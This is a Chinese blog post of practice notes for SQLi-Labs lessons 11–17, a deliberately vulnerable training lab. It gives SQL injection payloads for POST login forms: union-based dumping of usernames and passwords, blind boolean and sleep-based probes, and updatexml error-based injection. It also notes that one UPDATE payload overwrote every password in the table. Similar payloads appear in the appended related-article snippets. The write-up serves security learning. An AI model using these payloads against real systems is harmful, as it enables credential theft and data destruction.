SQLi-Lab练习笔记(11-17)

最新推荐文章于 2023-08-30 21:38:05 发布
最新推荐文章于 2023-08-30 21:38:05 发布
阅读量169 收藏
点赞数
分类专栏: Web安全 文章标签: 数据库 mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39091609/article/details/117171007
版权

Lesson 11单引号字符串

POST注入直接填写Payload不方便,而且还有可能被前端的输入过滤机制过滤掉,所以使用了Burp Suite代理截获请求包,如图所示:
在这里插入图片描述
验证漏洞:

uname=aaa’ or 1=1 #&passwd=bbb&submit=Submit
uname=aaa’ or 1=2 #&passwd=bbb&submit=Submit

exp:

uname=Dumb’ order by 3 #&passwd=bbb&submit=Submit //验证select列数为2
uname=aaa’ union select database(),user() #&passwd=bbb&submit=Submit //获取用户名和数据库名
uname=aaa’ union select table_name,2 from information_schema.tables where table_schema=database() limit 0,1#&passwd=bbb&submit=Submit //遍历表
uname=aaa’ union select column_name,2 from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1#&passwd=bbb&submit=Submit //遍历列名
uname=aaa’ union select username, password from users limit 0,1#&passwd=bbb&submit=Submit //获取指定字段值

Lesson 12双引号加括号

根据Lesson 12的标题,对照上次做的GET类型猜测应该是用括号把查询的值包裹起来了,所以尝试了一下:

uname=a") or 1=1 #&passwd=11&submit=Submit //可以注入

exp:

uname=a") union select database(),user() #&passwd=11&submit=Submit //获取数据库信息
uname=a") union select username, password from users limit 0,1 #&passwd=11&submit=Submit //获取指定表的指定字段值

Lesson 13单引号括号无回显

看了一下源码,需要闭合括号:

uname=aa’) or ‘1’=‘1’ #&passwd=2&submit=Submit //显示出成功的图片

exp:

uname=aaa’) or length(database())=8 #&passwd=2&submit=Submit //确定数据库名称长度为8
uname=aaa’) or left(database(),1)=‘s’ #&passwd=2&submit=Submit //确定数据库名第一个字符为s
中间的省略…
uname=aaa’) or length((select username from users limit 0,1))=4 #&passwd=2&submit=Submit //确定username的长度为4
uname=aaa’) or left((select username from users limit 0,1),1)=‘D’ #&passwd=2&submit=Submit //确定查询出的username值第一个字符为D

Lesson 14双引号字符串

这个和上一节的标题一样的,但是绕过不一样,可能是作者搞错了。
在这里插入图片描述
试了几发不中之后选择看源码,原来就是拿双引号替换了单引号。。。
exp:

uname=11" or length(database())=8 #&passwd=11&submit=Submit //获取数据库名长度
uname=11" or mid(database(),1,1)=‘s’ #&passwd=11&submit=Submit //确定数据库名第一个字符是s
…其他的类似

Lesson 15单引号盲注

和Lesson 13类似,甚至还要简单,这个不需要括号了。
exp:

uname=1’ or length(database())=8 #&passwd=2&submit=Submit //验证数据库名长度为8
uname=1’ or left(database(),1)=‘s’ #&passwd=2&submit=Submit //数据库第一个字符为s

Lesson 16和Lesson 12一样 双引号加括号

Lesson 17Update注入报错

通过源码发现这里首先对uname的值进行了反斜杠过滤和转义,且只截取前15个字符,所以这里只能考虑对passwd下手。源码里先执行一次对用户名的查询,后执行一次更新,其中更新语言是这么写的:

UPDATE users SET password = '$passwd' WHERE username='$row1';

我的第一感觉是控制password,从后面的单引号开始截断,但是这里还需要保证通过第一次查询的语句,不然不会执行我构造的password,值得注意的是题目中给出了用户名Dhakkan,于是造出了如下的payload:

uname=Dhakkan&passwd=123’ where 1=1 and if(length(database())=8,sleep(5),1) %23

运行以后发现确实截断SQL语句成功了,但是执行了好长一段时间。回头再看一下发现这么做非常不合适甚至有些危险,因为这么做实际上一旦后面的语句成真就会更新整个数据表的记录,打开数据库一看果然所有密码都成了123,这也解释了为什么会执行的如此之慢,每条记录停留5秒,共执行13*5=65秒。
在这里插入图片描述
去查了下大佬们的做法,基本都是报错注入:

uname=Dhakkan&passwd=12333333’ or updatexml(1,concat(0x2b5d7e,database(),0x2b5d7e), 1) %23

在这里插入图片描述

当updatexml(arg1,arg2,arg3)的第二个参数为xpath语法,我们给他一个错误的xpath格式就会返回错误信息并在前端显示。而且报错时程序不会继续执行,即不会更改数据库中的值,而需要使用concat()函数连接上一些奇怪的字符,一是为了引起报错,二是为了把我们想要的信息与其他报错提示区分开来。
exp:

uname=Dhakkan&passwd=12333333’ or updatexml(1,concat(0x2b5d7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x2b5d7e), 1) %23
执行结果为:XPATH syntax error: ‘+]~users+]~’

uname=Dhakkan&passwd=12333333’ or updatexml(1,concat(0x2b5d7e,(select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit 0,1),0x2b5d7e), 1) %23
遍历表中的字段名

在这里插入图片描述

uname=Dhakkan&passwd=12333333’ or updatexml(1,concat(0x2b5d7e,(select username from (select * from users limit 0,1)bieming),0x2b5d7e), 1) %23
查询表字段值这里需要用到别名,否则不符合SQL语法

在这里插入图片描述

uh3ng
关注
专栏目录
sqli-lab平台注入练习十一,十二,十三
chuxuezheerer的博客
10-07 383
Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 从11题开始要新的篇章了,这里的注入方式改为了POST注入。 我们首先先应用前10题的一个解题思路来解决这道题,构建注入的语句。 用“”万能密码“来构造, 尝试登陆,发现能行 之后开始进行数据库的爆破: Username: ' union select ...
SQLi Labs Lesson11
1ame的博客
08-13 461
Lesson-11 POST - Error Based - Single Quotes - String 首先进入欢迎界面 貌似从本节开始学习POST类型的SQL注入。 首先随便尝试登陆。 点击Submit后,结果如图所示。 在username中foo后面加单引号,点击Submit查看结果。 本节是有错误回显的,根据错误回显,发
sqli_labs lesson11 学习笔记
Quincy1015的博客
11-26 339
经过分析可以发现程序对参数进行单引号的处理。在username框中输入1' union select 1,database()#  password框中随便输入一个 1 可以发现当前的数据库是security在username框中输入1' union select 1,database()#  password框中随便输入一个 1 在username框中输入1'
自学SQL网:Lesson 11学习笔记
Yozenam的博客
04-20 196
HAVING语法 SELECT group_by_column, AGG_FUNC(column_expression) AS aggregate_result_alias, … FROM mytable WHERE condition GROUP BY column HAVING group_condition;
sqli-11 基于post提交注入
告白的博客
07-10 274
0x00 GET与POST提交方式的不同 get是将提交信息展现在url中提交,是我们能够直接看到的,而post提交方式是将信息在数据包中传递,post提交通过将表单内容各个字段放在html header中传递我们用户无法看到传递过程,get是向服务器获取数据的形式,而post则是向服务器传递数据,get传送的数据量较小,不能大于2KB。 post传送的数据量较大,一般被默认为不受限制。get提交比较起来比post方便,但是post提交方式比get更加的安全稳固,重点需要理解post提交方式用户提交的信息
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
最新发布
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
Sqli-Labs(第11关~第42关)通关笔记
weixin_54894046的博客
11-16 1151
sql注入lesson-11~31
浅谈自己关于SQL注入的认识
m0_48520508的博客
07-31 425
一、简介 本文作者是个努力进入渗透测试行业的小白,希望通过写文章来巩固自己所学习的知识,文章中可能有的地方会有误差,这个充满各种玄幻的计算机世界,有很多灵异错误,我暂时把自己认为对的写出来,如果您看到这篇文章,有什么错误可以直接指出,如果这篇文章可以给您带来一点小小的启发,那就更好了。​ 免责声明:这篇文章仅供小白之间的学习交流,请勿通过学习文章之后对真实网站进行测试 二、正文: 0x01 SQL注入原理 SQL注入概念及产生原因? 当web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参
sqli-labs靶场 Pass01-04通关秘诀(详解版)
鱼溯的博客
08-30 416
sqli-labs靶场 Pass01-04通关秘诀(详解版)
sqli-labs 11-20关通关指南(详细解读)
weixin_44576725的博客
11-08 2342
前言:这里的关卡多为post注入,故结合burpsuite进行抓包分析 Less-11 1、post注入,先在username输入admin’,password随便输,返回错误信息,从错误信息可知在username处应该有注入点,且可能为字符注入类型: 抓包: 2、加上万能语句or 1=1#,修改为admin’ or 1=1#,发现登陆成功,而且用户默认为dumb,可确定为字符型注入: 3、order by确定列数,确定为2: 4、开始爆破数据库、表名、列名: 数据库名: 表名: 列名
sqli-labs练习
qq_43147309的博客
04-29 265
less-1——单引号字符型注入 id=1’ and 1=1 ­­
sqli-labs之报错注入练习笔记
haha516130的博客
06-11 354
http://localhost/sqli-labs-master/Less-11/ 输入: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) # ' and updatexml(1,concat(0x7e,(select database()),0x7e),1) # updatexml()函数的格式为:updatexml (xml_document, XPath_string, new_value); 参数:xml_document是Str
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sql-lab闯关tips 第十一~十二关
weixin_44089266的博客
04-09 264
**第十一关为post型注入,第十二关于第十一关基本相同,只是闭合方式的不同,只对第十一关进行详解 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅 ** 由于是POST型注入,故需要使用burp进行代理抓包,以便修改其中传递的内容 burp工具传送门 链接:burp提取 提取码:3xzh 根据其详解配置好burp后,即可进行抓包,若有...
SQLi-Lab练习笔记(1-10)
uh_eng的博客
05-19 207
Lesson 1字符串注入 验证SQL注入: http://10.10.10.133:8080/Less-1/?id=1’ and ‘1’=‘1 http://10.10.10.133:8080/Less-1/?id=1’ and ‘1’='2 exp: 获取数据库信息: http://10.10.10.133:8080/Less-1/?id=1’ order by 4 %23 //从order by 1到4,得到报错,说明select了三个字段 http://10.10.10.133:808
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值